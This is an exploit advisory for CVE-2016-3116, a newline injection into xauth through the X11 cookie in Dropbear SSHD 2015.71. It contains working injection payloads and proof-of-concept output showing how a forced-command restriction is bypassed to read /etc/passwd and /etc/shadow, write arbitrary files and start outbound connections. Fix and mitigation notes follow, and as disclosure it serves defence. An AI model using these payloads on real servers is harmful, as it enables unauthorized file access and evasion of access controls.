DropBearSSHD 2015.71 - Command Injection

EDB-ID:

40119


Author:

tintinweb

Type:

remote


Platform:

Linux

Date:

2016-03-03


VuNote
============

	Author:		<github.com/tintinweb>
	Ref:		https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116
	Version: 	0.2
	Date: 		Mar 3rd, 2016
	
	Tag:		dropbearsshd xauth command injection may lead to forced-command bypass

Overview
--------

	Name:			dropbear
	Vendor:			Matt Johnston
	References:		* https://matt.ucc.asn.au/dropbear/dropbear.html [1]
	
	Version:		2015.71
	Latest Version:	2015.71
	Other Versions:	<= 2015.71 (basically all versions with x11fwd support; v0.44 ~11 years)
	Platform(s):	linux
	Technology:		c

	Vuln Classes:	CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
	Origin:			remote
	Min. Privs.:	post auth

	CVE:			CVE-2016-3116



Description
---------

quote website [1]

>Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for "embedded"-type Linux (or other Unix) systems, such as wireless routers.

Summary 
-------

An authenticated user may inject arbitrary xauth commands by sending an
x11 channel request that includes a newline character in the x11 cookie. 
The newline acts as a command separator to the xauth binary. This attack requires 
the server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector.

By injecting xauth commands one gains limited* read/write arbitrary files, 
information leakage or xauth-connect capabilities. These capabilities can be
leveraged by an authenticated restricted user - e.g. one with configured forced-commands - to bypass 
account restriction. This is generally not expected.

The injected xauth commands are performed with the effective permissions of the 
logged in user as the sshd already dropped its privileges. 

Quick-Info:

* requires: X11Forwarding yes
* does *NOT* bypass /bin/false due to special treatment (like nologin)
* bypasses forced-commands (allows arbitr. read/write)

Capabilities (xauth):

* Xauth
	* write file: limited chars, xauthdb format
	* read file: limit lines cut at first \s
	* infoleak: environment
	* connect to other devices (may allow port probing)


see attached PoC


Details
-------

// see annotated code below

	* x11req (svr-x11fwd.c:46)
      
    * execchild (svr-chansession.c:893)
     *- x11setauth (svr-x11fwd.c:129)

Upon receiving an `x11-req` type channel request dropbearsshd parses the channel request
parameters `x11authprot` and `x11authcookie` from the client ssh packet where
`x11authprot` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)
and `x11authcookie` contains the actual x11 auth cookie. This information is stored
in a session specific datastore. When calling `execute` on that session, dropbear will
call `execchild` and - in case it was compiled with x11 support - setup x11 forwarding
by executing `xauth` with the effective permissions of the user and pass commands via `stdin`.
Note that `x11authcookie` nor `x11authprot` was sanitized or validated, it just contains
user-tainted data. Since `xauth` commands are passed via `stdin` and `\n` is a
command-separator to the `xauth` binary, this allows a client to inject arbitrary
`xauth` commands.

This is an excerpt of the `man xauth` [2] to outline the capabilities of this xauth
command injection:

	SYNOPSIS
       	xauth [ -f authfile ] [ -vqibn ] [ command arg ... ]

		add displayname protocolname hexkey
		generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]
		[n]extract filename displayname...
		[n]list [displayname...]
		[n]merge [filename...]
		remove displayname...
		source filename
		info  
		exit
		quit
		version
		help
		?
		
Interesting commands are:
	
	info	 - leaks environment information / path
			~# xauth info
			xauth:  file /root/.Xauthority does not exist
			Authority file:       /root/.Xauthority
			File new:             yes
			File locked:          no
			Number of entries:    0
			Changes honored:      yes
			Changes made:         no
			Current input:        (argv):1
	
	source	 - arbitrary file read (cut on first `\s`)
			# xauth source /etc/shadow
			xauth:  file /root/.Xauthority does not exist
			xauth: /etc/shadow:1:  unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::"
						
	extract  - arbitrary file write 
			 * limited characters
	         * in xauth.db format
	         * since it is not compressed it can be combined with `xauth add` to 
	           first store data in the database and then export it to an arbitrary
	           location e.g. to plant a shell or do other things.
	
	generate - connect to <ip>:<port> (port probing, connect back and pot. exploit
			   vulnerabilities in X.org
	
	
Source
------

Inline annotations are prefixed with `//#!`

* handle x11 request, stores cookie in `chansess`
	```c
	/* called as a request for a session channel, sets up listening X11 */
	/* returns DROPBEAR_SUCCESS or DROPBEAR_FAILURE */
	int x11req(struct ChanSess * chansess) {
	
		int fd;
	
		/* we already have an x11 connection */
		if (chansess->x11listener != NULL) {
			return DROPBEAR_FAILURE;
		}
	
		chansess->x11singleconn = buf_getbyte(ses.payload);
		chansess->x11authprot = buf_getstring(ses.payload, NULL);			//#! store user tainted data
		chansess->x11authcookie = buf_getstring(ses.payload, NULL);			//#! store user tainted data
		chansess->x11screennum = buf_getint(ses.payload);
	```
	
* set auth cookie/authprot

	```c
	/* This is called after switching to the user, and sets up the xauth
	 * and environment variables.  */
	void x11setauth(struct ChanSess *chansess) {
	
		char display[20]; /* space for "localhost:12345.123" */
		FILE * authprog = NULL;
		int val;
	
		if (chansess->x11listener == NULL) {
			return;
		}
	
		...
	
		/* popen is a nice function - code is strongly based on OpenSSH's */
		authprog = popen(XAUTH_COMMAND, "w");										//#!  run xauth binary
		if (authprog) {
			fprintf(authprog, "add %s %s %s\n",
					display, chansess->x11authprot, chansess->x11authcookie);		//#!  \n injection in cookie, authprot
			pclose(authprog);
		} else {
			fprintf(stderr, "Failed to run %s\n", XAUTH_COMMAND);
		}
	}
	```

Proof of Concept
----------------

Prerequisites: 

* install python 2.7.x
* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x
* run `poc.py`

Note: see cve-2016-3115 [3] for `poc.py`

	 Usage: <host> <port> <username> <password or path_to_privkey>
	        
	        path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key
	        

poc:

1. configure one user (user1) for `force-commands`:
	```c 
	#PUBKEY line - force commands: only allow "whoami"
	#cat /home/user1/.ssh/authorized_keys
	command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box

	#cat /etc/passwd
	user1:x:1001:1001:,,,:/home/user1:/bin/bash
	```
	    
2. run dropbearsshd (x11fwd is on by default)

	```c
	#> ~/dropbear-2015.71/dropbear -R -F -E -p 2222
	[22861] Not backgrounding
	[22862] Child connection from 192.168.139.1:49597
	[22862] Forced command 'whoami'
	[22862] Pubkey auth succeeded for 'user1' with key md5 dc:b8:56:71:89:36:fb:dc:0e:a0:2b:17:b9:83:d2:dd from 192.168.139.1:49597
	```	

3. `forced-commands` - connect with user1 and display env information

	```c
	#> python <host> 2222 user1 .demoprivkey
	
	INFO:__main__:add this line to your authorized_keys file: 
	#PUBKEY line - force commands: only allow "whoami"
	#cat /home/user/.ssh/authorized_keys
	command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box
	
	INFO:__main__:connecting to: user1:<PKEY>@192.168.139.129:2222
	INFO:__main__:connected!
	INFO:__main__:
	Available commands:
	    .info
	    .readfile <path>
	    .writefile <path> <data>
	    .exit .quit
	    <any xauth command or type help>
	
	#> .info
	DEBUG:__main__:auth_cookie: '\ninfo'
	DEBUG:__main__:dummy exec returned: None
	INFO:__main__:Authority file:       /home/user1/.Xauthority
	File new:             no
	File locked:          no
	Number of entries:    2
	Changes honored:      yes
	Changes made:         no
	Current input:        (stdin):2
	user1
	/usr/bin/xauth: (stdin):1:  bad "add" command line
	
	...
	```
	
4. `forced-commands` - read `/etc/passwd`

	```c
	...
	#> .readfile /etc/passwd
	DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
	DEBUG:__main__:dummy exec returned: None
	INFO:__main__:root:x:0:0:root:/root:/bin/bash
	daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
	bin:x:2:2:bin:/bin:/usr/sbin/nologin
	sys:x:3:3:sys:/dev:/usr/sbin/nologin
	sync:x:4:65534:sync:/bin:/bin/sync
	...
	```
		
5. `forced-commands` - write `/tmp/testfile`

	```c
	#> .writefile /tmp/testfile1 `thisisatestfile`
	DEBUG:__main__:auth_cookie: '\nadd 127.0.0.250:65500 `thisisatestfile` aa'
	DEBUG:__main__:dummy exec returned: None
	DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile1 127.0.0.250:65500'
	DEBUG:__main__:dummy exec returned: None
	DEBUG:__main__:user1
	/usr/bin/xauth: (stdin):1:  bad "add" command line
	
	#> INFO:__main__:/tmp/testfile1
	
	#> ls -lsat /tmp/testfile1
	4 -rw------- 1 user1 user1 59 xx xx 12:51 /tmp/testfile1
	
	#> cat /tmp/testfile1
	ú65500hiú65500`thisisatestfile`ªr
	```
	
6. `forced-commands` - initiate outbound X connection to 8.8.8.8:6100

	```c
	#> generate 8.8.8.8:100
	DEBUG:__main__:auth_cookie: '\ngenerate 8.8.8.8:100'
	DEBUG:__main__:dummy exec returned: None
	INFO:__main__:user1
	/usr/bin/xauth: (stdin):1:  bad "add" command line
	/usr/bin/xauth: (stdin):2:  unable to open display "8.8.8.8:100".
	
	#> tcpdump 
	IP <host> 8.8.8.8.6100: Flags [S], seq 81800807, win 29200, options [mss 1460,sackOK,TS val 473651893 ecr 0,nop,wscale 10], length 0
	```	

Fix
---

* Sanitize user-tainted input `chansess->x11authcookie`


Mitigation / Workaround
------------------------

* disable x11-forwarding: re-compile without x11 support: remove `options.h` -> `#define ENABLE_X11FWD`

Notes
-----

Thanks to the OpenSSH team for coordinating the fix!

Vendor response see: changelog [4]


References
----------

	[1] https://matt.ucc.asn.au/dropbear/dropbear.html
	[2] http://linux.die.net/man/1/xauth
	[3] https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115/
	[4] https://matt.ucc.asn.au/dropbear/CHANGES
	
Contact
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	https://github.com/tintinweb